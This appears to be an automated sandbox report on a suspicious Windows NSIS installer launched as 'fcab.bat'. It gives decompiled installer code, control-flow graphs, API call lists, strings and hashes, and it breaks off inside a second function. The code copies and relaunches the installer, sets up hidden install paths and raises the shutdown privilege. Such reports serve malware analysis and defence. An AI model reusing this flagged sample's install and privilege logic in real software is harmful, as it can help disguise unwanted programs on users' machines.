403c1f 5068->5072 5070 403ba0 GetClassInfoW 5069->5070 5073 4065b6 3 API calls 5069->5073 5075 403bb4 GetClassInfoW RegisterClassW 5070->5075 5076 403bca DialogBoxParamW 5070->5076 5071->5048 5078 40140b 2 API calls 5071->5078 5074 40140b 2 API calls 5072->5074 5073->5070 5074->5048 5075->5076 5077 40140b 2 API calls 5076->5077 5077->5048 5078->5048 5079->4928 5080->4961 5081->4929 5083 403898 5082->5083 5084 40388a CloseHandle 5082->5084 5118 4038c5 5083->5118 5084->5083 5087 40595a 67 API calls 5088 4036b3 OleUninitialize 5087->5088 5088->4936 5088->4937 5089->4969 5090->4980 5091->4997 5092->4999 5093->5003 5095 402e66 5094->5095 5096 402e7e 5094->5096 5097 402e76 5095->5097 5098 402e6f DestroyWindow 5095->5098 5099 402e86 5096->5099 5100 402e8e GetTickCount 5096->5100 5097->5006 5098->5097 5101 406662 2 API calls 5099->5101 5102 402e9c CreateDialogParamW ShowWindow 5100->5102 5103 402ebf 5100->5103 5104 402e8c 5101->5104 5102->5103 5103->5006 5104->5006 5105->5012 5106->5014 5108 403c44 5107->5108 5117 406193 wsprintfW 5108->5117 5110 403cb5 5111 403ce9 18 API calls 5110->5111 5113 403cba 5111->5113 5112 4039e5 5112->5036 5113->5112 5114 40626e 17 API calls 5113->5114 5114->5113 5115->5032 5116->5038 5117->5110 5119 4038d3 5118->5119 5120 4038d8 FreeLibrary GlobalFree 5119->5120 5121 40389d 5119->5121 5120->5120 5120->5121 5121->5087

                                                          Executed Functions

                                                          Function 0040333D Relevance: 86.2, APIs: 33, Strings: 16, Instructions: 412stringfilecomCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 0 40333d-40337a SetErrorMode GetVersion 1 40337c-403384 call 406626 0->1 2 40338d 0->2 1->2 7 403386 1->7 4 403392-4033a6 call 4065b6 lstrlenA 2->4 9 4033a8-4033c4 call 406626 * 3 4->9 7->2 16 4033d5-403436 #17 OleInitialize SHGetFileInfoW call 40624c GetCommandLineW call 40624c GetModuleHandleW 9->16 17 4033c6-4033cc 9->17 24 403440-40345a call 405b4a CharNextW 16->24 25 403438-40343f 16->25 17->16 21 4033ce 17->21 21->16 28 403460-403466 24->28 29 403571-40358b GetTempPathW call 40330c 24->29 25->24 30 403468-40346d 28->30 31 40346f-403473 28->31 36 4035e3-4035fd DeleteFileW call 402ec1 29->36 37 40358d-4035ab GetWindowsDirectoryW lstrcatW call 40330c 29->37 30->30 30->31 33 403475-403479 31->33 34 40347a-40347e 31->34 33->34 38 403484-40348a 34->38 39 40353d-40354a call 405b4a 34->39 56 403603-403609 36->56 57 4036ae-4036be call 403880 OleUninitialize 36->57 37->36 52 4035ad-4035dd GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 40330c 37->52 43 4034a5-4034de 38->43 44 40348c-403494 38->44 54 40354c-40354d 39->54 55 40354e-403554 39->55 50 4034e0-4034e5 43->50 51 4034fb-403535 43->51 48 403496-403499 44->48 49 40349b 44->49 48->43 48->49 49->43 50->51 58 4034e7-4034ef 50->58 51->39 53 403537-40353b 51->53 52->36 52->57 53->39 62 40355c-40356a call 40624c 53->62 54->55 55->28 63 40355a 55->63 64 40369e-4036a5 call 40395a 56->64 65 40360f-40361a call 405b4a 56->65 73 4037e4-4037ea 57->73 74 4036c4-4036d4 call 4058ae ExitProcess 57->74 59 4034f1-4034f4 58->59 60 4034f6 58->60 59->51 59->60 60->51 69 40356f 62->69 63->69 76 4036aa 64->76 80 403668-403672 65->80 81 40361c-403651 65->81 69->29 78 403868-403870 73->78 79 4037ec-403802 GetCurrentProcess OpenProcessToken 73->79 76->57 82 403872 78->82 83 403876-40387a ExitProcess 78->83 87 403804-403832 LookupPrivilegeValueW AdjustTokenPrivileges 79->87 88 403838-403846 call 406626 79->88 85 403674-403682 call 405c25 80->85 86 4036da-4036ee call 405819 lstrcatW 80->86 89 403653-403657 81->89 82->83 85->57 99 403684-40369a call 40624c * 2 85->99 100 4036f0-4036f6 lstrcatW 86->100 101 4036fb-403715 lstrcatW lstrcmpiW 86->101 87->88 102 403854-40385f ExitWindowsEx 88->102 103 403848-403852 88->103 93 403660-403664 89->93 94 403659-40365e 89->94 93->89 95 403666 93->95 94->93 94->95 95->80 99->64 100->101 101->57 105 403717-40371a 101->105 102->78 106 403861-403863 call 40140b 102->106 103->102 103->106 109 403723 call 4057fc 105->109 110 40371c-403721 call 40577f 105->110 106->78 117 403728-403736 SetCurrentDirectoryW 109->117 110->117 118 403743-40376c call 40624c 117->118 119 403738-40373e call 40624c 117->119 123 403771-40378d call 40626e DeleteFileW 118->123 119->118 126 4037ce-4037d6 123->126 127 40378f-40379f CopyFileW 123->127 126->123 128 4037d8-4037df call 406012 126->128 127->126 129 4037a1-4037c1 call 406012 call 40626e call 405831 127->129 128->57 129->126 138 4037c3-4037ca CloseHandle 129->138 138->126
                                                          C-Code - Quality: 81%
                                                          			_entry_() {
				signed int _t51;
				intOrPtr* _t56;
				WCHAR* _t60;
				char* _t63;
				void* _t66;
				void* _t68;
				int _t70;
				int _t72;
				int _t75;
				intOrPtr* _t76;
				int _t77;
				int _t79;
				void* _t103;
				signed int _t120;
				void* _t123;
				void* _t128;
				intOrPtr _t147;
				intOrPtr _t148;
				intOrPtr* _t149;
				int _t151;
				void* _t154;
				int _t155;
				signed int _t159;
				signed int _t164;
				signed int _t169;
				void* _t171;
				WCHAR* _t172;
				signed int _t175;
				signed int _t178;
				CHAR* _t179;
				void* _t182;
				int* _t184;
				void* _t192;
				char* _t193;
				void* _t196;
				void* _t197;
				void* _t243;

				_t171 = 0x20;
				_t151 = 0;
				 *(_t197 + 0x14) = 0;
				 *(_t197 + 0x10) = L"Error writing temporary file. Make sure your temp folder is valid.";
				 *(_t197 + 0x1c) = 0;
				SetErrorMode(0x8001); // executed
				_t51 = GetVersion() & 0xbfffffff;
				 *0x42a20c = _t51;
				if(_t51 != 6) {
					_t149 = E00406626(0);
					if(_t149 != 0) {
						 *_t149(0xc00);
					}
				}
				_t179 = "UXTHEME";
				goto L4;
				L8:
				__imp__#17(_t192);
				__imp__OleInitialize(_t151); // executed
				 *0x42a2d8 = _t56;
				SHGetFileInfoW(0x4216a8, _t151, _t197 + 0x34, 0x2b4, _t151); // executed
				E0040624C(0x429200, L"NSIS Error");
				_t60 = GetCommandLineW();
				_t193 = L"\"C:\\Users\\Public\\fcab.bat\" ";
				E0040624C(_t193, _t60);
				 *0x42a200 = GetModuleHandleW(_t151);
				_t63 = _t193;
				if(L"\"C:\\Users\\Public\\fcab.bat\" " == 0x22) {
					_t63 =  &M00435002;
					_t171 = 0x22;
				}
				_t155 = CharNextW(E00405B4A(_t63, _t171));
				 *(_t197 + 0x18) = _t155;
				_t66 =  *_t155;
				if(_t66 == _t151) {
					L33:
					_t172 = L"C:\\Users\\hardz\\AppData\\Local\\Temp\\";
					GetTempPathW(0x400, _t172);
					_t68 = E0040330C(_t155, 0);
					_t225 = _t68;
					if(_t68 != 0) {
						L36:
						DeleteFileW(L"1033"); // executed
						_t70 = E00402EC1(_t227,  *(_t197 + 0x1c)); // executed
						 *(_t197 + 0x10) = _t70;
						if(_t70 != _t151) {
							L48:
							E00403880();
							__imp__OleUninitialize();
							_t239 =  *(_t197 + 0x10) - _t151;
							if( *(_t197 + 0x10) == _t151) {
								__eflags =  *0x42a2b4 - _t151;
								if( *0x42a2b4 == _t151) {
									L72:
									_t72 =  *0x42a2cc;
									__eflags = _t72 - 0xffffffff;
									if(_t72 != 0xffffffff) {
										 *(_t197 + 0x10) = _t72;
									}
									ExitProcess( *(_t197 + 0x10));
								}
								_t75 = OpenProcessToken(GetCurrentProcess(), 0x28, _t197 + 0x14);
								__eflags = _t75;
								if(_t75 != 0) {
									LookupPrivilegeValueW(_t151, L"SeShutdownPrivilege", _t197 + 0x20);
									 *(_t197 + 0x34) = 1;
									 *(_t197 + 0x40) = 2;
									AdjustTokenPrivileges( *(_t197 + 0x28), _t151, _t197 + 0x24, _t151, _t151, _t151);
								}
								_t76 = E00406626(4);
								__eflags = _t76 - _t151;
								if(_t76 == _t151) {
									L70:
									_t77 = ExitWindowsEx(2, 0x80040002);
									__eflags = _t77;
									if(_t77 != 0) {
										goto L72;
									}
									goto L71;
								} else {
									_t79 =  *_t76(_t151, _t151, _t151, 0x25, 0x80040002);
									__eflags = _t79;
									if(_t79 == 0) {
										L71:
										E0040140B(9);
										goto L72;
									}
									goto L70;
								}
							}
							E004058AE( *(_t197 + 0x10), 0x200010);
							ExitProcess(2);
						}
						if( *0x42a220 == _t151) {
							L47:
							 *0x42a2cc =  *0x42a2cc | 0xffffffff;
							 *(_t197 + 0x14) = E0040395A( *0x42a2cc);
							goto L48;
						}
						_t184 = E00405B4A(_t193, _t151);
						if(_t184 < _t193) {
							L44:
							_t236 = _t184 - _t193;
							 *(_t197 + 0x10) = L"Error launching installer";
							if(_t184 < _t193) {
								_t182 = E00405819(_t239);
								lstrcatW(_t172, L"~nsu");
								if(_t182 != _t151) {
									lstrcatW(_t172, "A");
								}
								lstrcatW(_t172, L".tmp");
								_t195 = L"C:\\Users\\Public";
								if(lstrcmpiW(_t172, L"C:\\Users\\Public") != 0) {
									_push(_t172);
									if(_t182 == _t151) {
										E004057FC();
									} else {
										E0040577F();
									}
									SetCurrentDirectoryW(_t172);
									_t243 = L"C:\\Users\\hardz\\AppData\\Local\\Microsoft\\Windows\\INetCache\\spilplatform\\Thenceforth" - _t151; // 0x43
									if(_t243 == 0) {
										E0040624C(L"C:\\Users\\hardz\\AppData\\Local\\Microsoft\\Windows\\INetCache\\spilplatform\\Thenceforth", _t195);
									}
									E0040624C(0x42b000,  *(_t197 + 0x18));
									_t156 = "A" & 0x0000ffff;
									 *0x42b800 = ( *0x40a25a & 0x0000ffff) << 0x00000010 | "A" & 0x0000ffff;
									_t196 = 0x1a;
									do {
										E0040626E(_t151, _t172, 0x420ea8, 0x420ea8,  *((intOrPtr*)( *0x42a214 + 0x120)));
										DeleteFileW(0x420ea8);
										if( *(_t197 + 0x10) != _t151 && CopyFileW(0x438800, 0x420ea8, 1) != 0) {
											E00406012(_t156, 0x420ea8, _t151);
											E0040626E(_t151, _t172, 0x420ea8, 0x420ea8,  *((intOrPtr*)( *0x42a214 + 0x124)));
											_t103 = E00405831(0x420ea8);
											if(_t103 != _t151) {
												CloseHandle(_t103);
												 *(_t197 + 0x10) = _t151;
											}
										}
										 *0x42b800 =  *0x42b800 + 1;
										_t196 = _t196 - 1;
									} while (_t196 != 0);
									E00406012(_t156, _t172, _t151);
								}
								goto L48;
							}
							 *_t184 = _t151;
							_t185 =  &(_t184[2]);
							if(E00405C25(_t236,  &(_t184[2])) == 0) {
								goto L48;
							}
							E0040624C(L"C:\\Users\\hardz\\AppData\\Local\\Microsoft\\Windows\\INetCache\\spilplatform\\Thenceforth", _t185);
							E0040624C(L"C:\\Users\\hardz\\AppData\\Local\\Microsoft\\Windows\\INetCache\\spilplatform\\Thenceforth", _t185);
							 *(_t197 + 0x10) = _t151;
							goto L47;
						}
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_t159 = ( *0x40a27e & 0x0000ffff) << 0x00000010 | L" _?=" & 0x0000ffff;
						_t120 = ( *0x40a282 & 0x0000ffff) << 0x00000010 |  *0x40a280 & 0x0000ffff | (_t164 << 0x00000020 |  *0x40a282 & 0x0000ffff) << 0x10;
						while( *_t184 != _t159 || _t184[1] != _t120) {
							_t184 = _t184;
							if(_t184 >= _t193) {
								continue;
							}
							break;
						}
						_t151 = 0;
						goto L44;
					}
					GetWindowsDirectoryW(_t172, 0x3fb);
					lstrcatW(_t172, L"\\Temp");
					_t123 = E0040330C(_t155, _t225);
					_t226 = _t123;
					if(_t123 != 0) {
						goto L36;
					}
					GetTempPathW(0x3fc, _t172);
					lstrcatW(_t172, L"Low");
					SetEnvironmentVariableW(L"TEMP", _t172);
					SetEnvironmentVariableW(L"TMP", _t172);
					_t128 = E0040330C(_t155, _t226);
					_t227 = _t128;
					if(_t128 == 0) {
						goto L48;
					}
					goto L36;
				} else {
					do {
						_t154 = 0x20;
						if(_t66 != _t154) {
							L13:
							if( *_t155 == 0x22) {
								_t155 = _t155 + 2;
								_t154 = 0x22;
							}
							if( *_t155 != 0x2f) {
								goto L27;
							} else {
								_t155 = _t155 + 2;
								if( *_t155 == 0x53) {
									_t148 =  *((intOrPtr*)(_t155 + 2));
									if(_t148 == 0x20 || _t148 == 0) {
										 *0x42a2c0 = 1;
									}
								}
								asm("cdq");
								asm("cdq");
								_t169 = L"NCRC" & 0x0000ffff;
								asm("cdq");
								_t175 = ( *0x40a2c2 & 0x0000ffff) << 0x00000010 |  *0x40a2c0 & 0x0000ffff | _t169;
								if( *_t155 == (( *0x40a2be & 0x0000ffff) << 0x00000010 | _t169) &&  *((intOrPtr*)(_t155 + 4)) == _t175) {
									_t147 =  *((intOrPtr*)(_t155 + 8));
									if(_t147 == 0x20 || _t147 == 0) {
										 *(_t197 + 0x1c) =  *(_t197 + 0x1c) | 0x00000004;
									}
								}
								asm("cdq");
								asm("cdq");
								_t164 = L" /D=" & 0x0000ffff;
								asm("cdq");
								_t178 = ( *0x40a2b6 & 0x0000ffff) << 0x00000010 |  *0x40a2b4 & 0x0000ffff | _t164;
								if( *(_t155 - 4) != (( *0x40a2b2 & 0x0000ffff) << 0x00000010 | _t164) ||  *_t155 != _t178) {
									goto L27;
								} else {
									 *(_t155 - 4) =  *(_t155 - 4) & 0x00000000;
									__eflags = _t155;
									E0040624C(L"C:\\Users\\hardz\\AppData\\Local\\Microsoft\\Windows\\INetCache\\spilplatform\\Thenceforth", _t155);
									L32:
									_t151 = 0;
									goto L33;
								}
							}
						} else {
							goto L12;
						}
						do {
							L12:
							_t155 = _t155 + 2;
						} while ( *_t155 == _t154);
						goto L13;
						L27:
						_t155 = E00405B4A(_t155, _t154);
						if( *_t155 == 0x22) {
							_t155 = _t155 + 2;
						}
						_t66 =  *_t155;
					} while (_t66 != 0);
					goto L32;
				}
				L4:
				E004065B6(_t179); // executed
				_t179 =  &(_t179[lstrlenA(_t179) + 1]);
				if( *_t179 != 0) {
					goto L4;
				} else {
					E00406626(0xa);
					 *0x42a204 = E00406626(8);
					_t56 = E00406626(6);
					if(_t56 != _t151) {
						_t56 =  *_t56(0x1e);
						if(_t56 != 0) {
							 *0x42a20f =  *0x42a20f | 0x00000040;
						}
					}
					goto L8;
				}
			}








































                                                          0x00403348
                                                          0x00403349
                                                          0x00403350
                                                          0x00403354
                                                          0x0040335c
                                                          0x00403360
                                                          0x0040336c
                                                          0x00403375
                                                          0x0040337a
                                                          0x0040337d
                                                          0x00403384
                                                          0x0040338b
                                                          0x0040338b
                                                          0x00403384
                                                          0x0040338d
                                                          0x0040338d
                                                          0x004033d5
                                                          0x004033d6
                                                          0x004033dd
                                                          0x004033e3
                                                          0x004033f9
                                                          0x00403409
                                                          0x0040340e
                                                          0x00403414
                                                          0x0040341b
                                                          0x0040342f
                                                          0x00403434
                                                          0x00403436
                                                          0x0040343a
                                                          0x0040343f
                                                          0x0040343f
                                                          0x0040344e
                                                          0x00403450
                                                          0x00403454
                                                          0x0040345a
                                                          0x00403571
                                                          0x00403577
                                                          0x00403582
                                                          0x00403584
                                                          0x00403589
                                                          0x0040358b
                                                          0x004035e3
                                                          0x004035e8
                                                          0x004035f2
                                                          0x004035f9
                                                          0x004035fd
                                                          0x004036ae
                                                          0x004036ae
                                                          0x004036b3
                                                          0x004036b9
                                                          0x004036be
                                                          0x004037e4
                                                          0x004037ea
                                                          0x00403868
                                                          0x00403868
                                                          0x0040386d
                                                          0x00403870
                                                          0x00403872
                                                          0x00403872
                                                          0x0040387a
                                                          0x0040387a
                                                          0x004037fa
                                                          0x00403800
                                                          0x00403802
                                                          0x0040380f
                                                          0x00403822
                                                          0x0040382a
                                                          0x00403832
                                                          0x00403832
                                                          0x0040383a
                                                          0x0040383f
                                                          0x00403846
                                                          0x00403854
                                                          0x00403857
                                                          0x0040385d
                                                          0x0040385f
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00403848
                                                          0x0040384e
                                                          0x00403850
                                                          0x00403852
                                                          0x00403861
                                                          0x00403863
                                                          0x00000000
                                                          0x00403863
                                                          0x00000000
                                                          0x00403852
                                                          0x00403846
                                                          0x004036cd
                                                          0x004036d4
                                                          0x004036d4
                                                          0x00403609
                                                          0x0040369e
                                                          0x0040369e
                                                          0x004036aa
                                                          0x00000000
                                                          0x004036aa
                                                          0x00403616
                                                          0x0040361a
                                                          0x00403668
                                                          0x00403668
                                                          0x0040366a
                                                          0x00403672
                                                          0x004036e5
                                                          0x004036e7
                                                          0x004036ee
                                                          0x004036f6
                                                          0x004036f6
                                                          0x00403701
                                                          0x00403706
                                                          0x00403715
                                                          0x00403719
                                                          0x0040371a
                                                          0x00403723
                                                          0x0040371c
                                                          0x0040371c
                                                          0x0040371c
                                                          0x00403729
                                                          0x0040372f
                                                          0x00403736
                                                          0x0040373e
                                                          0x0040373e
                                                          0x0040374c
                                                          0x00403758
                                                          0x00403766
                                                          0x0040376b
                                                          0x00403771
                                                          0x0040377d
                                                          0x00403783
                                                          0x0040378d
                                                          0x004037a3
                                                          0x004037b4
                                                          0x004037ba
                                                          0x004037c1
                                                          0x004037c4
                                                          0x004037ca
                                                          0x004037ca
                                                          0x004037c1
                                                          0x004037ce
                                                          0x004037d5
                                                          0x004037d5
                                                          0x004037da
                                                          0x004037da
                                                          0x00000000
                                                          0x00403715
                                                          0x00403674
                                                          0x00403677
                                                          0x00403682
                                                          0x00000000
                                                          0x00000000
                                                          0x0040368a
                                                          0x00403695
                                                          0x0040369a
                                                          0x00000000
                                                          0x0040369a
                                                          0x00403623
                                                          0x0040363b
                                                          0x0040364c
                                                          0x0040364d
                                                          0x00403651
                                                          0x00403653
                                                          0x00403661
                                                          0x00403664
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00403664
                                                          0x00403666
                                                          0x00000000
                                                          0x00403666
                                                          0x00403593
                                                          0x0040359f
                                                          0x004035a4
                                                          0x004035a9
                                                          0x004035ab
                                                          0x00000000
                                                          0x00000000
                                                          0x004035b3
                                                          0x004035bb
                                                          0x004035cc
                                                          0x004035d4
                                                          0x004035d6
                                                          0x004035db
                                                          0x004035dd
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00403460
                                                          0x00403460
                                                          0x00403462
                                                          0x00403466
                                                          0x0040346f
                                                          0x00403473
                                                          0x00403478
                                                          0x00403479
                                                          0x00403479
                                                          0x0040347e
                                                          0x00000000
                                                          0x00403484
                                                          0x00403485
                                                          0x0040348a
                                                          0x0040348c
                                                          0x00403494
                                                          0x0040349b
                                                          0x0040349b
                                                          0x00403494
                                                          0x004034ac
                                                          0x004034bf
                                                          0x004034c0
                                                          0x004034d5
                                                          0x004034da
                                                          0x004034de
                                                          0x004034e7
                                                          0x004034ef
                                                          0x004034f6
                                                          0x004034f6
                                                          0x004034ef
                                                          0x00403502
                                                          0x00403515
                                                          0x00403516
                                                          0x0040352b
                                                          0x00403531
                                                          0x00403535
                                                          0x00000000
                                                          0x0040355c
                                                          0x0040355c
                                                          0x00403561
                                                          0x0040356a
                                                          0x0040356f
                                                          0x0040356f
                                                          0x00000000
                                                          0x0040356f
                                                          0x00403535
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00403468
                                                          0x00403468
                                                          0x00403469
                                                          0x0040346a
                                                          0x00000000
                                                          0x0040353d
                                                          0x00403544
                                                          0x0040354a
                                                          0x0040354d
                                                          0x0040354d
                                                          0x0040354e
                                                          0x00403551
                                                          0x00000000
                                                          0x0040355a
                                                          0x00403392
                                                          0x00403393
                                                          0x0040339f
                                                          0x004033a6
                                                          0x00000000
                                                          0x004033a8
                                                          0x004033aa
                                                          0x004033b8
                                                          0x004033bd
                                                          0x004033c4
                                                          0x004033c8
                                                          0x004033cc
                                                          0x004033ce
                                                          0x004033ce
                                                          0x004033cc
                                                          0x00000000
                                                          0x004033c4

                                                          APIs
                                                          • SetErrorMode.KERNELBASE ref: 00403360
                                                          • GetVersion.KERNEL32 ref: 00403366
                                                          • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403399
                                                          • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 004033D6
                                                          • OleInitialize.OLE32(00000000), ref: 004033DD
                                                          • SHGetFileInfoW.SHELL32(004216A8,00000000,?,000002B4,00000000), ref: 004033F9
                                                          • GetCommandLineW.KERNEL32(00429200,NSIS Error,?,00000006,00000008,0000000A), ref: 0040340E
                                                          • GetModuleHandleW.KERNEL32(00000000,"C:\Users\Public\fcab.bat" ,00000000,?,00000006,00000008,0000000A), ref: 00403421
                                                          • CharNextW.USER32(00000000,"C:\Users\Public\fcab.bat" ,00000020,?,00000006,00000008,0000000A), ref: 00403448
                                                            • Part of subcall function 00406626: GetModuleHandleA.KERNEL32(?,00000020,?,004033AF,0000000A), ref: 00406638
                                                            • Part of subcall function 00406626: GetProcAddress.KERNEL32(00000000,?), ref: 00406653
                                                          • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403582
                                                          • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 00403593
                                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040359F
                                                          • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004035B3
                                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004035BB
                                                          • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 004035CC
                                                          • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 004035D4
                                                          • DeleteFileW.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 004035E8
                                                            • Part of subcall function 0040624C: lstrcpynW.KERNEL32(?,?,00000400,0040340E,00429200,NSIS Error,?,00000006,00000008,0000000A), ref: 00406259
                                                          • OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 004036B3
                                                          • ExitProcess.KERNEL32 ref: 004036D4
                                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 004036E7
                                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C), ref: 004036F6
                                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 00403701
                                                          • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\Public,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\Public\fcab.bat" ,00000000,00000006,?,00000006,00000008,0000000A), ref: 0040370D
                                                          • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403729
                                                          • DeleteFileW.KERNEL32(00420EA8,00420EA8,?,0042B000,00000008,?,00000006,00000008,0000000A), ref: 00403783
                                                          • CopyFileW.KERNEL32(00438800,00420EA8,00000001,?,00000006,00000008,0000000A), ref: 00403797
                                                          • CloseHandle.KERNEL32(00000000,00420EA8,00420EA8,?,00420EA8,00000000,?,00000006,00000008,0000000A), ref: 004037C4
                                                          • GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 004037F3
                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 004037FA
                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0040380F
                                                          • AdjustTokenPrivileges.ADVAPI32 ref: 00403832
                                                          • ExitWindowsEx.USER32 ref: 00403857
                                                          • ExitProcess.KERNEL32 ref: 0040387A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.644793479.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.644775997.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644817233.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_fcab.jbxd
                                                          Similarity
                                                          • API ID: lstrcat$FileProcess$ExitHandle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                          • String ID: "C:\Users\Public\fcab.bat" $.tmp$1033$C:\Users\Public$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\spilplatform\Thenceforth$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\spilplatform\Thenceforth$C:\Users\user\AppData\Local\Temp\$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                          • API String ID: 2488574733-2276730641
                                                          • Opcode ID: d2a13487a049f8695112171eabf7473e6d565728a0202d7647594f6489cd5a4d
                                                          • Instruction ID: 8796dd7fda2277e74c31c2c32d36de8c434ed5469641edba7c3d6f01ab9f589a
                                                          • Opcode Fuzzy Hash: d2a13487a049f8695112171eabf7473e6d565728a0202d7647594f6489cd5a4d
                                                          • Instruction Fuzzy Hash: 8AD11470600310ABD7207F759D45B2B3AACEB4074AF10447EF881B62D1DB7E8956CB6E
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004053EF Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 284windowclipboardmemoryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 139 4053ef-40540a 140 405410-4054d7 GetDlgItem * 3 call 404216 call 404b4d GetClientRect GetSystemMetrics SendMessageW * 2 139->140 141 405599-4055a0 139->141 163 4054f5-4054f8 140->163 164 4054d9-4054f3 SendMessageW * 2 140->164 143 4055a2-4055c4 GetDlgItem CreateThread FindCloseChangeNotification 141->143 144 4055ca-4055d7 141->144 143->144 146 4055f5-4055ff 144->146 147 4055d9-4055df 144->147 151 405601-405607 146->151 152 405655-405659 146->152 149 4055e1-4055f0 ShowWindow * 2 call 404216 147->149 150 40561a-405623 call 404248 147->150 149->146 160 405628-40562c 150->160 157 405609-405615 call 4041ba 151->157 158 40562f-40563f ShowWindow 151->158 152->150 155 40565b-405661 152->155 155->150 165 405663-405676 SendMessageW 155->165 157->150 161 405641-40564a call 4052b0 158->161 162 40564f-405650 call 4041ba 158->162 161->162 162->152 168 405508-40551f call 4041e1 163->168 169 4054fa-405506 SendMessageW 163->169 164->163 170 405778-40577a 165->170 171 40567c-4056a7 CreatePopupMenu call 40626e AppendMenuW 165->171 176 405521-405535 ShowWindow 168->176 177 405555-405576 GetDlgItem SendMessageW 168->177 169->168 170->160 178 4056a9-4056b9 GetWindowRect 171->178 179 4056bc-4056d1 TrackPopupMenu 171->179 180 405544 176->180 181 405537-405542 ShowWindow 176->181 177->170 183 40557c-405594 SendMessageW * 2 177->183 178->179 179->170 182 4056d7-4056ee 179->182 184 40554a-405550 call 404216 180->184 181->184 185 4056f3-40570e SendMessageW 182->185 183->170 184->177 185->185 186 405710-405733 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 185->186 188 405735-40575c SendMessageW 186->188 188->188 189 40575e-405772 GlobalUnlock SetClipboardData CloseClipboard 188->189 189->170
                                                          C-Code - Quality: 95%
                                                          			E004053EF(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				long _v12;
				struct tagRECT _v28;
				void* _v36;
				signed int _v40;
				int _v44;
				int _v48;
				signed int _v52;
				int _v56;
				void* _v60;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t94;
				long _t95;
				int _t100;
				void* _t108;
				intOrPtr _t119;
				void* _t127;
				intOrPtr _t130;
				struct HWND__* _t134;
				int _t156;
				int _t159;
				struct HMENU__* _t164;
				struct HWND__* _t168;
				struct HWND__* _t169;
